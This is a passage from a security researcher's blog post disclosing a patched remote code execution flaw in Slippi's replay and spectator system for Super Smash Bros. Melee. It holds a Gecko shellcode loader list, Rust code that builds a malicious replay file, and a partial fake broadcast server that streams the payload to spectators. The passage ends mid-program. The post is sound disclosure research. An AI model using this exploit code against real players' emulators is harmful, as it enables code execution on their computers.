Khang's StuffZola2026-04-09T00:00:00+00:00https://khang06.github.io/atom.xmlSlipping up Slippi with spectator RCE2026-04-09T00:00:00+00:002026-04-09T00:00:00+00:00https://khang06.github.io/slippirce/<p><em><strong>This vulnerability is patched in Slippi Playback Dolphin 3.5.2, released January 14th, 2026. The launcher automatically updates it.</strong></em></p>
<p><a rel="external" href="https://en.wikipedia.org/wiki/Super_Smash_Bros._Melee">Super Smash Bros. Melee</a> is a very popular <del>party</del> fighting game for the Nintendo GameCube. Despite three other entries <em>(four if you're weird and count Smash 4 as two games)</em> in the nearly 25 years since its release, Melee still enjoys a healthy competitive scene to this day due to its rushed development unintentionally leading to a fast-paced playstyle rarely seen in later, more casual-focused games. Major tournaments gather hundreds of players and sometimes even outnumber those playing the latest entry, Super Smash Bros. Ultimate!</p>
<p>Nowadays, most people want to play games with their friends over the internet, but since the GameCube was released when most people didn't have broadband, online play didn't exist for most of its library, including Melee. Of course, given that this is a game released on an old Nintendo console, it's safe to assume the majority of its players aren't playing exclusively on original hardware.</p>
<p>Instead, people play on Slippi.</p>
<p><img src="/img/slippirce/slippimenu.png" alt="" /></p>
<p><a rel="external" href="https://slippi.gg">Slippi</a> is a Melee mod that deeply integrates with its own fork of the <a rel="external" href="https://dolphin-emu.org">Dolphin</a> GameCube/Wii emulator to bring automatic matchmaking, modern <a rel="external" href="https://en.wikipedia.org/wiki/Netcode#Rollback">rollback netcode</a>, and other quality-of-life improvements to an otherwise ancient console-only game. It's widely regarded as one of the main reasons Melee has maintained a consistent playerbase nowadays since it greatly lowers the barrier to entry for newcomers. Its netcode is also much, much better than the official online code in the later games <em>(if you've ever played Ultimate against someone on Wi-Fi, you know how it feels).</em></p>
<p>Naturally, I wondered the same thing I do with anything else that interacts with random people on the internet:</p>
<p>Is there anything to exploit here?</p>
<h1 id="guest-code-execution">Guest Code Execution<a class="zola-anchor" href="#guest-code-execution" aria-label="Anchor link for: guest-code-execution"><i class="fas fa-link"></i></a>
</h1>
<p>The first step toward any emulator escape shenanigans is getting my own code running inside the emulator in the first place. (Un)fortunately, I couldn't find anything exploitable in the main matchmaking modes, so instead I took a look at Slippi's replay system. The specification for Slippi's <code>.slp</code> replay format is publicly documented and available <a rel="external" href="https://github.com/project-slippi/slippi-wiki/blob/master/SPEC.md">here</a>.</p>
<p>One of the event types caught my eye:
<img src="/img/slippirce/geckolist.png" alt="" /></p>
<p>Gecko codes are cheat codes, much like Action Replay or Game Genie codes. Despite being "cheat" codes, Gecko codes also get used as a general-purpose way of modding GameCube and Wii games. Slippi is no different here, as almost all of the patches it applies to Melee are <a rel="external" href="https://github.com/project-slippi/slippi-ssbm-asm">applied as Gecko codes</a>. Slippi also lets you use your own Gecko codes online, provided that they either don't change any gameplay mechanics or are also being used by your opponent <em>(as scary as letting people use their own mods sounds, there aren't any random <a rel="external" href="https://www.youtube.com/watch?v=5asTiS_FILQ">Super Pichus</a> online since that would just lead to a desync)</em>. Storing Gecko codes in the replay file itself lets you play them back without needing to memorize what codes were used to record it, which is convenient for watching matches that used gameplay-altering codes.</p>
<p>Since Slippi happily loads any Gecko codes stored in a replay, running my own code from a replay file is fairly trivial because it's basically just a feature. All I have to do is write some shellcode to a random spot in memory and write a branch to it somewhere in game code. Easy!</p>
<p>Writing a big Gecko code list manually is annoying, so I used the <a rel="external" href="https://github.com/JLaferri/gecko"><code>gecko</code></a> tool that's also used in Slippi's build system. Also, instead of writing my exploit code as self-contained shellcode, I decided to be lazy and use FIX94's <a rel="external" href="https://github.com/FIX94/gc-exploit-common-loader">gc-exploit-common-loader</a> to chain from being in the middle of game code to loading a normal <code>.dol</code> executable I hardcoded somewhere else in memory. This lets me run my exploit code on its own during testing, then just copy it over to the replay loader later.</p>
<p>This gives me one really, really long Gecko code list:</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="plain"><span class="giallo-l"><span>$Entrypoint []</span></span>
<span class="giallo-l"><span>C216E750 00000007 #entry.S</span></span>
<span class="giallo-l"><span>7C6000A6 5463045E</span></span>
<span class="giallo-l"><span>7C600124 4C00012C</span></span>
<span class="giallo-l"><span>3C208000 60213000</span></span>
<span class="giallo-l"><span>38000000 9401FFC0</span></span>
<span class="giallo-l"><span>3C608000 60631800</span></span>
<span class="giallo-l"><span>7C6803A6 4E800020</span></span>
<span class="giallo-l"><span>60000000 00000000</span></span>
<span class="giallo-l"><span>04001800 7C6000A6</span></span>
<span class="giallo-l"><span>04001804 5463045E</span></span>
<span class="giallo-l"><span>04001808 60632000</span></span>
<span class="giallo-l"><span>0400180C 7C600124</span></span>
<span class="giallo-l"><span>04001810 4C00012C</span></span>
<span class="giallo-l"><span>...</span></span></code></pre>
<p>Now, how exactly does this get written into the replay file? Unfortunately, the specification is a bit vague about how this gets formatted internally, so I had to do some poking around on my own. I used the <a rel="external" href="https://github.com/hohav/peppi"><code>peppi</code></a> library to read and write Slippi replays, but it also doesn't fully parse the Gecko code section. Fortunately, the Gecko code event format is basically just a binary version of what's normally in a Gecko code file, with the size aligned to 512 bytes.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="rust"><span class="giallo-l"><span style="color: #569CD6;">use</span><span> std</span><span style="color: #D4D4D4;">::</span><span>{fs</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">File</span><span>, io</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">BufReader</span><span>};</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">use</span><span> peppi</span><span style="color: #D4D4D4;">::</span><span>{game</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">GeckoCodes</span><span>, io</span><span style="color: #D4D4D4;">::</span><span>slippi};</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Maybe it would be easier to use the GCT output here, idk</span></span>
<span class="giallo-l"><span style="color: #569CD6;">fn</span><span style="color: #DCDCAA;"> convert_codes</span><span>()</span><span style="color: #D4D4D4;"> -></span><span style="color: #4EC9B0;"> GeckoCodes</span><span> {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> file</span><span style="color: #D4D4D4;"> =</span><span> std</span><span style="color: #D4D4D4;">::</span><span>fs</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">read_to_string</span><span>(</span><span style="color: #CE9178;">"../entry.txt"</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> bytes</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> vec!</span><span>[];</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span style="color: #9CDCFE;"> line</span><span style="color: #569CD6;"> in</span><span style="color: #9CDCFE;"> file</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">lines</span><span>() {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> line</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> line</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">trim</span><span>();</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span style="color: #9CDCFE;"> line</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">starts_with</span><span>(</span><span style="color: #CE9178;">'$'</span><span>) {</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> continue</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> parts</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> line</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">split_once</span><span>(</span><span style="color: #CE9178;">' '</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span style="color: #9CDCFE;"> parts</span><span style="color: #D4D4D4;">.</span><span style="color: #B5CEA8;">1.</span><span style="color: #DCDCAA;">len</span><span>() ></span><span style="color: #B5CEA8;"> 8</span><span> {</span></span>
<span class="giallo-l"><span> (</span><span style="color: #9CDCFE;">parts</span><span style="color: #D4D4D4;">.</span><span style="color: #B5CEA8;">1</span><span>,</span><span style="color: #9CDCFE;"> _</span><span>)</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> parts</span><span style="color: #D4D4D4;">.</span><span style="color: #B5CEA8;">1.</span><span style="color: #DCDCAA;">split_at</span><span>(</span><span style="color: #B5CEA8;">8</span><span>);</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> first</span><span style="color: #D4D4D4;"> =</span><span style="color: #4EC9B0;"> u32</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">from_str_radix</span><span>(</span><span style="color: #9CDCFE;">parts</span><span style="color: #D4D4D4;">.</span><span style="color: #B5CEA8;">0</span><span>,</span><span style="color: #B5CEA8;"> 16</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> second</span><span style="color: #D4D4D4;"> =</span><span style="color: #4EC9B0;"> u32</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">from_str_radix</span><span>(</span><span style="color: #9CDCFE;">parts</span><span style="color: #D4D4D4;">.</span><span style="color: #B5CEA8;">1</span><span>,</span><span style="color: #B5CEA8;"> 16</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> bytes</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">extend_from_slice</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #9CDCFE;">first</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">to_be_bytes</span><span>());</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> bytes</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">extend_from_slice</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #9CDCFE;">second</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">to_be_bytes</span><span>());</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> bytes</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">extend_from_slice</span><span>(</span><span style="color: #D4D4D4;">&</span><span>[</span><span style="color: #B5CEA8;">0xFF</span><span>,</span><span style="color: #B5CEA8;"> 0x00</span><span>,</span><span style="color: #B5CEA8;"> 0x00</span><span>,</span><span style="color: #B5CEA8;"> 0x00</span><span>,</span><span style="color: #B5CEA8;"> 0x00</span><span>,</span><span style="color: #B5CEA8;"> 0x00</span><span>,</span><span style="color: #B5CEA8;"> 0x00</span><span>,</span><span style="color: #B5CEA8;"> 0x00</span><span>]);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span style="color: #9CDCFE;"> bytes</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">len</span><span>()</span><span style="color: #D4D4D4;"> %</span><span style="color: #B5CEA8;"> 512</span><span style="color: #D4D4D4;"> !=</span><span style="color: #B5CEA8;"> 0</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> bytes</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">resize</span><span>(((</span><span style="color: #9CDCFE;">bytes</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">len</span><span>()</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 512</span><span>)</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 1</span><span>)</span><span style="color: #D4D4D4;"> *</span><span style="color: #B5CEA8;"> 512</span><span>,</span><span style="color: #B5CEA8;"> 0</span><span>);</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> actual_size</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> bytes</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">len</span><span>()</span><span style="color: #569CD6;"> as</span><span style="color: #4EC9B0;"> u32</span><span>;</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> GeckoCodes</span><span> {</span><span style="color: #9CDCFE;"> bytes</span><span>,</span><span style="color: #9CDCFE;"> actual_size</span><span> }</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">fn</span><span style="color: #DCDCAA;"> main</span><span>() {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> r</span><span style="color: #D4D4D4;"> =</span><span style="color: #4EC9B0;"> BufReader</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">new</span><span>(File</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">open</span><span>(</span><span style="color: #CE9178;">"../base.slp"</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>());</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> game</span><span style="color: #D4D4D4;"> =</span><span> slippi</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">read</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #569CD6;">mut</span><span style="color: #9CDCFE;"> r</span><span>,</span><span style="color: #4EC9B0;"> None</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> game</span><span style="color: #D4D4D4;">.</span><span>start</span><span style="color: #D4D4D4;">.</span><span>slippi</span><span style="color: #D4D4D4;">.</span><span>version </span><span style="color: #D4D4D4;">=</span><span> slippi</span><span style="color: #D4D4D4;">::</span><span>MAX_SUPPORTED_VERSION;</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> game</span><span style="color: #D4D4D4;">.</span><span>gecko_codes </span><span style="color: #D4D4D4;">=</span><span style="color: #4EC9B0;"> Some</span><span>(</span><span style="color: #DCDCAA;">convert_codes</span><span>());</span></span>
<span class="giallo-l"><span> slippi</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">write</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #569CD6;">mut</span><span> File</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">create</span><span>(</span><span style="color: #CE9178;">"../exploit.slp"</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>(),</span><span style="color: #D4D4D4;"> &</span><span style="color: #9CDCFE;">game</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>Finally, we have arbitrary guest code execution from a replay!</p>
<p><span><video src="/img/slippirce/replayace.mp4" style="width: 100%" controls></video></span></p>
<p>...Okay, arbitrary code execution from a replay you have to convince someone to download and watch is a bit boring. I said there would be <em>remote</em> code execution, right?</p>
<h1 id="spectator-mode">Spectator Mode<a class="zola-anchor" href="#spectator-mode" aria-label="Anchor link for: spectator-mode"><i class="fas fa-link"></i></a>
</h1>
<p>In addition to letting people play online matches in a way that isn't awful, Slippi also lets people <em>watch</em> online matches in a way that isn't awful.</p>
<p><img src="/img/slippirce/spectate.png" alt="" /></p>
<p>Instead of requiring one of the players to screenshare on Discord to make their game watchable, Slippi's spectator mode sends just enough game state and input data to mirror the match onto another instance of Dolphin. This looks a lot better than a video stream while also using far less bandwidth, which is very much appreciated in a game that requires a half-decent internet connection. This is also commonly used by streamers running online tournaments for streaming and commentating matches, so an emulator escape that could be triggered purely from being a spectator would still be huge.</p>
<p>When starting a broadcast session, Slippi Launcher connects to an <a rel="external" href="http://enet.bespin.org/">ENet</a> server hosted by the Dolphin instance. Upon connecting, Dolphin starts sending the launcher a filtered selection of replay events, which the launcher then relays to a WebSocket hosted on Slippi's servers. On the receiving end, the launcher gets the replay events from the Slippi servers and streams them into a newly created <code>.slp</code> file, which the receiving Dolphin instance continuously tries to read events from.</p>
<p><img src="/img/slippirce/spectategraph.svg" alt="" /></p>
<p>So, in practice, spectator mode is basically just like reading any other replay file, but the events are being streamed instead. Since Gecko code events can also be sent to spectators, this means that arbitrary code can be executed inside the emulator in the same exact way, but it just has to be streamed to the server instead. Sounds easy enough.</p>
<p>To do this, I wrote a quick-and-dirty program that hosts its own ENet server and feeds Slippi Launcher replay events from a file instead.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="rust"><span class="giallo-l"><span style="color: #569CD6;">use</span><span> std</span><span style="color: #D4D4D4;">::</span><span>{</span></span>
<span class="giallo-l"><span> collections</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">HashMap</span><span>,</span></span>
<span class="giallo-l"><span> fs</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">File</span><span>,</span></span>
<span class="giallo-l"><span> io</span><span style="color: #D4D4D4;">::</span><span>{</span><span style="color: #4EC9B0;">BufReader</span><span>,</span><span style="color: #4EC9B0;"> Cursor</span><span>,</span><span style="color: #4EC9B0;"> Read</span><span>,</span><span style="color: #4EC9B0;"> Seek</span><span>,</span><span style="color: #4EC9B0;"> SeekFrom</span><span>},</span></span>
<span class="giallo-l"><span> net</span><span style="color: #D4D4D4;">::</span><span>{</span><span style="color: #4EC9B0;">SocketAddr</span><span>,</span><span style="color: #4EC9B0;"> UdpSocket</span><span>},</span></span>
<span class="giallo-l"><span> str</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">FromStr</span><span>,</span></span>
<span class="giallo-l"><span> time</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">Duration</span><span>,</span></span>
<span class="giallo-l"><span>};</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">use</span><span> base64</span><span style="color: #D4D4D4;">::</span><span>{</span><span style="color: #4EC9B0;">Engine</span><span>, prelude</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">BASE64_STANDARD</span><span>};</span></span>
<span class="giallo-l"><span style="color: #569CD6;">use</span><span> byteorder</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">ReadBytesExt</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">use</span><span> rusty_enet</span><span style="color: #D4D4D4;">::</span><span>{</span><span style="color: #4EC9B0;">Event</span><span>,</span><span style="color: #4EC9B0;"> Host</span><span>,</span><span style="color: #4EC9B0;"> HostSettings</span><span>,</span><span style="color: #4EC9B0;"> Packet</span><span>};</span></span>
<span class="giallo-l"><span style="color: #569CD6;">use</span><span> serde</span><span style="color: #D4D4D4;">::</span><span>{</span><span style="color: #4EC9B0;">Deserialize</span><span>,</span><span style="color: #4EC9B0;"> Serialize</span><span>};</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span>#[derive(</span><span style="color: #4EC9B0;">Deserialize</span><span>)]</span></span>
<span class="giallo-l"><span>#[serde(tag </span><span style="color: #D4D4D4;">=</span><span style="color: #CE9178;"> "type"</span><span>)]</span></span>
<span class="giallo-l"><span style="color: #569CD6;">enum</span><span style="color: #4EC9B0;"> MirrorRequest</span><span> {</span></span>
<span class="giallo-l"><span> #[serde(rename </span><span style="color: #D4D4D4;">=</span><span style="color: #CE9178;"> "connect_request"</span><span>)]</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> ConnectRequest</span><span> {</span><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #4EC9B0;"> usize</span><span> },</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span>#[derive(</span><span style="color: #4EC9B0;">Serialize</span><span>)]</span></span>
<span class="giallo-l"><span>#[serde(tag </span><span style="color: #D4D4D4;">=</span><span style="color: #CE9178;"> "type"</span><span>)]</span></span>
<span class="giallo-l"><span style="color: #569CD6;">enum</span><span style="color: #4EC9B0;"> MirrorResponse</span><span><'</span><span style="color: #4EC9B0;">a</span><span>> {</span></span>
<span class="giallo-l"><span> #[serde(rename </span><span style="color: #D4D4D4;">=</span><span style="color: #CE9178;"> "connect_reply"</span><span>)]</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> ConnectReply</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> nick</span><span style="color: #D4D4D4;">: &</span><span>'</span><span style="color: #4EC9B0;">a str</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> version</span><span style="color: #D4D4D4;">: &</span><span>'</span><span style="color: #4EC9B0;">a str</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #4EC9B0;"> usize</span><span>,</span></span>
<span class="giallo-l"><span> },</span></span>
<span class="giallo-l"><span> #[serde(rename </span><span style="color: #D4D4D4;">=</span><span style="color: #CE9178;"> "start_game"</span><span>)]</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> StartGame</span><span> {</span><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #4EC9B0;"> usize</span><span>,</span><span style="color: #9CDCFE;"> next_cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #4EC9B0;"> usize</span><span> },</span></span>
<span class="giallo-l"><span> #[serde(rename </span><span style="color: #D4D4D4;">=</span><span style="color: #CE9178;"> "game_event"</span><span>)]</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> GameEvent</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> payload</span><span style="color: #D4D4D4;">: &</span><span>'</span><span style="color: #4EC9B0;">a str</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #4EC9B0;"> usize</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> next_cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #4EC9B0;"> usize</span><span>,</span></span>
<span class="giallo-l"><span> },</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">fn</span><span style="color: #DCDCAA;"> main</span><span>() {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> socket</span><span style="color: #D4D4D4;"> =</span><span style="color: #4EC9B0;"> UdpSocket</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">bind</span><span>(SocketAddr</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">from_str</span><span>(</span><span style="color: #CE9178;">"0.0.0.0:51441"</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>())</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> host</span><span style="color: #D4D4D4;"> =</span><span style="color: #4EC9B0;"> Host</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">new</span><span>(</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> socket</span><span>,</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> HostSettings</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> peer_limit</span><span style="color: #D4D4D4;">:</span><span style="color: #B5CEA8;"> 4</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> channel_limit</span><span style="color: #D4D4D4;">:</span><span style="color: #B5CEA8;"> 2</span><span>,</span></span>
<span class="giallo-l"><span style="color: #D4D4D4;"> ..</span><span>Default</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">default</span><span>()</span></span>
<span class="giallo-l"><span> },</span></span>
<span class="giallo-l"><span> )</span></span>
<span class="giallo-l"><span style="color: #D4D4D4;"> .</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Ready!"</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> loop</span><span> {</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> while</span><span style="color: #569CD6;"> let</span><span style="color: #4EC9B0;"> Ok</span><span>(</span><span style="color: #9CDCFE;">packet</span><span>)</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> host</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">service</span><span>()</span></span>
<span class="giallo-l"><span style="color: #D4D4D4;"> &&</span><span style="color: #569CD6;"> let</span><span style="color: #4EC9B0;"> Some</span><span>(</span><span style="color: #9CDCFE;">event</span><span>)</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> packet</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> match</span><span style="color: #9CDCFE;"> event</span><span> {</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> Event</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">Connect</span><span> {</span><span style="color: #9CDCFE;"> peer</span><span>,</span><span style="color: #D4D4D4;"> ..</span><span> }</span><span style="color: #D4D4D4;"> =></span><span> {</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Peer {} connected"</span><span>,</span><span style="color: #9CDCFE;"> peer</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">id</span><span>()</span><span style="color: #D4D4D4;">.</span><span style="color: #B5CEA8;">0</span><span>);</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> Event</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">Disconnect</span><span> {</span><span style="color: #9CDCFE;"> peer</span><span>,</span><span style="color: #D4D4D4;"> ..</span><span> }</span><span style="color: #D4D4D4;"> =></span><span> {</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Peer {} disconnected"</span><span>,</span><span style="color: #9CDCFE;"> peer</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">id</span><span>()</span><span style="color: #D4D4D4;">.</span><span style="color: #B5CEA8;">0</span><span>);</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> Event</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">Receive</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> peer</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> channel_id</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> packet</span><span>,</span></span>
<span class="giallo-l"><span> }</span><span style="color: #D4D4D4;"> =></span><span> {</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span style="color: #569CD6;"> let</span><span style="color: #4EC9B0;"> Ok</span><span>(</span><span style="color: #9CDCFE;">message</span><span>)</span><span style="color: #D4D4D4;"> =</span><span style="color: #4EC9B0;"> str</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">from_utf8</span><span>(</span><span style="color: #9CDCFE;">packet</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">data</span><span>()) {</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Received packet: {message}"</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> send_packet</span><span style="color: #D4D4D4;"> = |</span><span style="color: #9CDCFE;">response</span><span style="color: #D4D4D4;">:</span><span style="color: #4EC9B0;"> MirrorResponse</span><span style="color: #D4D4D4;">|</span><span> {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> response_json</span><span style="color: #D4D4D4;"> =</span><span> serde_json</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">to_string</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #9CDCFE;">response</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Sending packet: {response_json}"</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> packet</span><span style="color: #D4D4D4;"> =</span><span style="color: #4EC9B0;"> Packet</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">reliable</span><span>(</span><span style="color: #9CDCFE;">response_json</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">as_bytes</span><span>());</span></span>
